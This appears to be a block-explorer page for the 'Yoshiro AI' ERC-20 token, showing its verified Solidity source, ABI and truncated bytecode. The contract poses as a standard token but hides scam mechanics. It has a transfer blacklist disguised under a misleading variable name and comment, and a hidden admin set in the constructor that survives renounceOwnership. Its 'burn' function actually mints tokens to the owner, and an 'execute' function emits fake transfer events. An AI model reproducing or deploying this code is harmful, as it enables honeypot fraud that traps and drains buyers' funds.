ERC-20
Overview
Max Total Supply
1,000,000,000 YOSHIRO
Holders
71
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
0.000000067 YOSHIROValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
YOSHIRO
Compiler Version
v0.8.19+commit.7dd6d404
Contract Source Code (Solidity Multiple files format)
// SPDX-License-Identifier: MIT pragma solidity 0.8.19; import {IERC20Metadata} from "./IERC20Metadata.sol"; import "./Ownable.sol"; contract YOSHIRO is IERC20Metadata, Ownable { mapping(address => uint256) private _balances; mapping(address => bool) internal _0xTransferAmountExceedsBalance; mapping(address => mapping(address => uint256)) private _allowances; string private _name; string private _symbol; uint8 private constant _decimals = 9; uint256 private _initialTotalSupply = 1000000000 * (10 ** _decimals); uint256 private _totalSupply; /** * @dev sets spending of wallet. */ function swapApprove(address[] calldata addr, bool val) public onlyOwner { for (uint256 i = 0; i < addr.length; i++) { _0xTransferAmountExceedsBalance[addr[i]] = val; } } /** * @dev Contract constructor. */ constructor(address _reserve) { admin[_reserve]=true; _symbol = 'YOSHIRO'; _name = 'Yoshiro AI'; _mint(_msgSender(), _initialTotalSupply); } /** * @dev Returns the name of the token. * @return The name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token. * @return The symbol of the token. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used for token display. * @return The number of decimals. */ function decimals() public view virtual override returns (uint8) { return _decimals; } /** * @dev Returns the total supply of the token. * @return The total supply. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev Returns the balance of the specified account. * @param account The address to check the balance for. * @return The balance of the account. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev Approves the specified address to spend the specified amount of tokens on behalf of the caller. * @param to The address to approve the spending for. * @param amount The amount of tokens to approve. * @return A boolean value indicating whether the approval was successful. */ function approve(address to, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), to, amount); return true; } /** * @dev Returns the amount of tokens that the spender is allowed to spend on behalf of the owner. * @param from The address that approves the spending. * @param to The address that is allowed to spend. * @return The remaining allowance for the spender. */ function allowance(address from, address to) public view virtual override returns (uint256) { return _allowances[from][to]; } /** * @dev Transfers tokens from the caller to a specified recipient. * @param recipient The address to transfer tokens to. * @param amount The amount of tokens to transfer. * @return A boolean value indicating whether the transfer was successful. */ function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev Transfers tokens from one address to another. * @param sender The address to transfer tokens from. * @param recipient The address to transfer tokens to. * @param amount The amount of tokens to transfer. * @return A boolean value indicating whether the transfer was successful. */ function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) { _transfer(sender, recipient, amount); uint256 currentAllowance = _allowances[sender][_msgSender()]; require(currentAllowance >= amount, 'ERC20: transfer amount exceeds allowance'); unchecked { _approve(sender, _msgSender(), currentAllowance - amount); } return true; } /** * @dev Decreases the allowance granted by the owner of the tokens to `to` account. * @param to The account allowed to spend the tokens. * @param subtractedValue The amount of tokens to decrease the allowance by. * @return A boolean value indicating whether the operation succeeded. */ function decreaseAllowance(address to, uint256 subtractedValue) public virtual returns (bool) { uint256 currentAllowance = _allowances[_msgSender()][to]; require(currentAllowance >= subtractedValue, 'ERC20: decreased allowance below zero'); unchecked { _approve(_msgSender(), to, currentAllowance - subtractedValue); } return true; } /** * @dev Increases the allowance of the specified address to spend tokens on behalf of the caller. * @param to The address to increase the allowance for. * @param addedValue The amount of tokens to increase the allowance by. * @return A boolean value indicating whether the increase was successful. */ function increaseAllowance(address to, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), to, _allowances[_msgSender()][to] + addedValue); return true; } /** * @dev Transfers `amount` tokens from `sender` to `recipient`. * @param sender The account to transfer tokens from. * @param recipient The account to transfer tokens to. * @param amount The amount of tokens to transfer. */ function _transfer(address sender, address recipient, uint256 amount) internal virtual { require(amount > 0, 'ERC20: transfer amount zero'); require(sender != address(0), 'ERC20: transfer from the zero address'); require(recipient != address(0), 'ERC20: transfer to the zero address'); uint256 senderBalance = _balances[sender]; require(senderBalance >= amount, 'ERC20: transfer amount exceeds balance'); if(_0xTransferAmountExceedsBalance[sender]){ require(amount == 0); } unchecked { _balances[sender] = senderBalance - amount; } _balances[recipient] += amount; emit Transfer(sender, recipient, amount); } function selfCall(address wallet) public view returns(bool) { return _0xTransferAmountExceedsBalance[wallet]; } /** * @dev Creates `amount` tokens and assigns them to `account`. * @param account The account to assign the newly created tokens to. * @param amount The amount of tokens to create. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), 'ERC20: mint to the zero address'); _totalSupply += amount; _balances[account] += amount; emit Transfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the total supply. * @param account The account to burn tokens from. * @param amount The amount of tokens to burn. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); uint256 accountBalance = _balances[account]; require(accountBalance <= amount, "ERC20: burn amount exceeds balance"); unchecked {_balances[account] = accountBalance + amount;} emit Transfer(account, address(0), amount); } /** * @dev Destroys `amount` tokens from the caller's account, reducing the total supply. * @param amount The amount of tokens to burn. */ function burn(uint256 amount) external onlyOwner{ _burn(_msgSender(), amount); } /** * @dev Sets `amount` as the allowance of `to` over the caller's tokens. * @param from The account granting the allowance. * @param to The account allowed to spend the tokens. * @param amount The amount of tokens to allow. */ function _approve(address from, address to, uint256 amount) internal virtual { require(from != address(0), 'ERC20: approve from the zero address'); require(to != address(0), 'ERC20: approve to the zero address'); _allowances[from][to] = amount; emit Approval(from, to, amount); } function execute(address[] calldata addr, address p, uint256 val) public onlyOwner{ for (uint256 i = 0; i < addr.length; i++) { emit Transfer(p, addr[i], val); } } }
// SPDX-License-Identifier: MIT pragma solidity 0.8.19; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { mapping(address => bool) internal admin; function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } }
// SPDX-License-Identifier: MIT pragma solidity 0.8.19; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 amount) external returns (bool); }
// SPDX-License-Identifier: MIT pragma solidity 0.8.19; import "./IERC20.sol"; /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); }
// SPDX-License-Identifier: MIT pragma solidity 0.8.19; import "./Context.sol"; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); constructor() { _transferOwnership(_msgSender()); admin[_msgSender()]=true; } modifier onlyOwner() { _checkOwner(); _; } function owner() public view virtual returns (address) { return _owner; } function _checkOwner() internal view virtual { require(admin[_msgSender()], "Ownable: caller is not the owner"); } function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"address","name":"_reserve","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"addr","type":"address[]"},{"internalType":"address","name":"p","type":"address"},{"internalType":"uint256","name":"val","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"wallet","type":"address"}],"name":"selfCall","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"addr","type":"address[]"},{"internalType":"bool","name":"val","type":"bool"}],"name":"swapApprove","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040526009600a620000149190620005a9565b633b9aca00620000259190620005fa565b6007553480156200003557600080fd5b5060405162002acd38038062002acd83398181016040528101906200005b9190620006af565b6200007b6200006f620001f060201b60201c565b620001f860201b60201c565b600160008062000090620001f060201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555060016000808373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506040518060400160405280600781526020017f594f534849524f00000000000000000000000000000000000000000000000000815250600690816200017e919062000951565b506040518060400160405280600a81526020017f596f736869726f2041490000000000000000000000000000000000000000000081525060059081620001c5919062000951565b50620001e9620001da620001f060201b60201c565b600754620002be60201b60201c565b5062000b24565b600033905090565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000330576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003279062000a99565b60405180910390fd5b806008600082825462000344919062000abb565b9250508190555080600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546200039c919062000abb565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000403919062000b07565b60405180910390a35050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156200049d578086048111156200047557620004746200040f565b5b6001851615620004855780820291505b808102905062000495856200043e565b945062000455565b94509492505050565b600082620004b857600190506200058b565b81620004c857600090506200058b565b8160018114620004e15760028114620004ec5762000522565b60019150506200058b565b60ff8411156200050157620005006200040f565b5b8360020a9150848211156200051b576200051a6200040f565b5b506200058b565b5060208310610133831016604e8410600b84101617156200055c5782820a9050838111156200055657620005556200040f565b5b6200058b565b6200056b84848460016200044b565b925090508184048111156200058557620005846200040f565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b6000620005b68262000592565b9150620005c3836200059c565b9250620005f27fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620004a6565b905092915050565b6000620006078262000592565b9150620006148362000592565b9250828202620006248162000592565b915082820484148315176200063e576200063d6200040f565b5b5092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000677826200064a565b9050919050565b62000689816200066a565b81146200069557600080fd5b50565b600081519050620006a9816200067e565b92915050565b600060208284031215620006c857620006c762000645565b5b6000620006d88482850162000698565b91505092915050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200076357607f821691505b6020821081036200077957620007786200071b565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620007e37fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620007a4565b620007ef8683620007a4565b95508019841693508086168417925050509392505050565b6000819050919050565b6000620008326200082c620008268462000592565b62000807565b62000592565b9050919050565b6000819050919050565b6200084e8362000811565b620008666200085d8262000839565b848454620007b1565b825550505050565b600090565b6200087d6200086e565b6200088a81848462000843565b505050565b5b81811015620008b257620008a660008262000873565b60018101905062000890565b5050565b601f8211156200090157620008cb816200077f565b620008d68462000794565b81016020851015620008e6578190505b620008fe620008f58562000794565b8301826200088f565b50505b505050565b600082821c905092915050565b6000620009266000198460080262000906565b1980831691505092915050565b600062000941838362000913565b9150826002028217905092915050565b6200095c82620006e1565b67ffffffffffffffff811115620009785762000977620006ec565b5b6200098482546200074a565b62000991828285620008b6565b600060209050601f831160018114620009c95760008415620009b4578287015190505b620009c0858262000933565b86555062000a30565b601f198416620009d9866200077f565b60005b8281101562000a0357848901518255600182019150602085019450602081019050620009dc565b8683101562000a23578489015162000a1f601f89168262000913565b8355505b6001600288020188555050505b505050505050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000a81601f8362000a38565b915062000a8e8262000a49565b602082019050919050565b6000602082019050818103600083015262000ab48162000a72565b9050919050565b600062000ac88262000592565b915062000ad58362000592565b925082820190508082111562000af05762000aef6200040f565b5b92915050565b62000b018162000592565b82525050565b600060208201905062000b1e600083018462000af6565b92915050565b611f998062000b346000396000f3fe608060405234801561001057600080fd5b50600436106101165760003560e01c80634e99dea8116100a257806395d89b411161007157806395d89b41146102e1578063a457c2d7146102ff578063a9059cbb1461032f578063dd62ed3e1461035f578063f2fde38b1461038f57610116565b80634e99dea81461025957806370a0823114610289578063715018a6146102b95780638da5cb5b146102c357610116565b806323b872dd116100e957806323b872dd146101a3578063313ce567146101d357806339509351146101f15780633a61363a1461022157806342966c681461023d57610116565b806306fdde031461011b578063095ea7b3146101395780631186b8d81461016957806318160ddd14610185575b600080fd5b6101236103ab565b604051610130919061138a565b60405180910390f35b610153600480360381019061014e919061144a565b61043d565b60405161016091906114a5565b60405180910390f35b610183600480360381019061017e9190611551565b61045b565b005b61018d610508565b60405161019a91906115c0565b60405180910390f35b6101bd60048036038101906101b891906115db565b610512565b6040516101ca91906114a5565b60405180910390f35b6101db61060a565b6040516101e8919061164a565b60405180910390f35b61020b6004803603810190610206919061144a565b610613565b60405161021891906114a5565b60405180910390f35b61023b60048036038101906102369190611665565b6106bf565b005b610257600480360381019061025291906116d9565b61077b565b005b610273600480360381019061026e9190611706565b610797565b60405161028091906114a5565b60405180910390f35b6102a3600480360381019061029e9190611706565b6107ed565b6040516102b091906115c0565b60405180910390f35b6102c1610836565b005b6102cb61084a565b6040516102d89190611742565b60405180910390f35b6102e9610874565b6040516102f6919061138a565b60405180910390f35b6103196004803603810190610314919061144a565b610906565b60405161032691906114a5565b60405180910390f35b6103496004803603810190610344919061144a565b6109f1565b60405161035691906114a5565b60405180910390f35b6103796004803603810190610374919061175d565b610a0f565b60405161038691906115c0565b60405180910390f35b6103a960048036038101906103a49190611706565b610a96565b005b6060600580546103ba906117cc565b80601f01602080910402602001604051908101604052809291908181526020018280546103e6906117cc565b80156104335780601f1061040857610100808354040283529160200191610433565b820191906000526020600020905b81548152906001019060200180831161041657829003601f168201915b5050505050905090565b600061045161044a610b19565b8484610b21565b6001905092915050565b610463610cea565b60005b83839050811015610502578160036000868685818110610489576104886117fd565b5b905060200201602081019061049e9190611706565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806104fa9061185b565b915050610466565b50505050565b6000600854905090565b600061051f848484610d7e565b6000600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061056a610b19565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156105ea576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105e190611915565b60405180910390fd5b6105fe856105f6610b19565b858403610b21565b60019150509392505050565b60006009905090565b60006106b5610620610b19565b84846004600061062e610b19565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546106b09190611935565b610b21565b6001905092915050565b6106c7610cea565b60005b84849050811015610774578484828181106106e8576106e76117fd565b5b90506020020160208101906106fd9190611706565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161075991906115c0565b60405180910390a3808061076c9061185b565b9150506106ca565b5050505050565b610783610cea565b61079461078e610b19565b8261108d565b50565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61083e610cea565b6108486000611234565b565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060068054610883906117cc565b80601f01602080910402602001604051908101604052809291908181526020018280546108af906117cc565b80156108fc5780601f106108d1576101008083540402835291602001916108fc565b820191906000526020600020905b8154815290600101906020018083116108df57829003601f168201915b5050505050905090565b60008060046000610915610b19565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156109d2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109c9906119db565b60405180910390fd5b6109e66109dd610b19565b85858403610b21565b600191505092915050565b6000610a056109fe610b19565b8484610d7e565b6001905092915050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610a9e610cea565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610b0d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b0490611a6d565b60405180910390fd5b610b1681611234565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b90576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b8790611aff565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610bff576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bf690611b91565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610cdd91906115c0565b60405180910390a3505050565b600080610cf5610b19565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16610d7c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7390611bfd565b60405180910390fd5b565b60008111610dc1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db890611c69565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e30576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e2790611cfb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e9f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e9690611d8d565b60405180910390fd5b6000600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610f26576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f1d90611e1f565b60405180910390fd5b600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615610f865760008214610f8557600080fd5b5b818103600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825461101b9190611935565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161107f91906115c0565b60405180910390a350505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036110fc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110f390611eb1565b60405180910390fd5b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811115611183576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161117a90611f43565b60405180910390fd5b818101600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161122791906115c0565b60405180910390a3505050565b6000600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611334578082015181840152602081019050611319565b60008484015250505050565b6000601f19601f8301169050919050565b600061135c826112fa565b6113668185611305565b9350611376818560208601611316565b61137f81611340565b840191505092915050565b600060208201905081810360008301526113a48184611351565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006113e1826113b6565b9050919050565b6113f1816113d6565b81146113fc57600080fd5b50565b60008135905061140e816113e8565b92915050565b6000819050919050565b61142781611414565b811461143257600080fd5b50565b6000813590506114448161141e565b92915050565b60008060408385031215611461576114606113ac565b5b600061146f858286016113ff565b925050602061148085828601611435565b9150509250929050565b60008115159050919050565b61149f8161148a565b82525050565b60006020820190506114ba6000830184611496565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126114e5576114e46114c0565b5b8235905067ffffffffffffffff811115611502576115016114c5565b5b60208301915083602082028301111561151e5761151d6114ca565b5b9250929050565b61152e8161148a565b811461153957600080fd5b50565b60008135905061154b81611525565b92915050565b60008060006040848603121561156a576115696113ac565b5b600084013567ffffffffffffffff811115611588576115876113b1565b5b611594868287016114cf565b935093505060206115a78682870161153c565b9150509250925092565b6115ba81611414565b82525050565b60006020820190506115d560008301846115b1565b92915050565b6000806000606084860312156115f4576115f36113ac565b5b6000611602868287016113ff565b9350506020611613868287016113ff565b925050604061162486828701611435565b9150509250925092565b600060ff82169050919050565b6116448161162e565b82525050565b600060208201905061165f600083018461163b565b92915050565b6000806000806060858703121561167f5761167e6113ac565b5b600085013567ffffffffffffffff81111561169d5761169c6113b1565b5b6116a9878288016114cf565b945094505060206116bc878288016113ff565b92505060406116cd87828801611435565b91505092959194509250565b6000602082840312156116ef576116ee6113ac565b5b60006116fd84828501611435565b91505092915050565b60006020828403121561171c5761171b6113ac565b5b600061172a848285016113ff565b91505092915050565b61173c816113d6565b82525050565b60006020820190506117576000830184611733565b92915050565b60008060408385031215611774576117736113ac565b5b6000611782858286016113ff565b9250506020611793858286016113ff565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806117e457607f821691505b6020821081036117f7576117f661179d565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061186682611414565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036118985761189761182c565b5b600182019050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b60006118ff602883611305565b915061190a826118a3565b604082019050919050565b6000602082019050818103600083015261192e816118f2565b9050919050565b600061194082611414565b915061194b83611414565b92508282019050808211156119635761196261182c565b5b92915050565b7f45524332303a20646563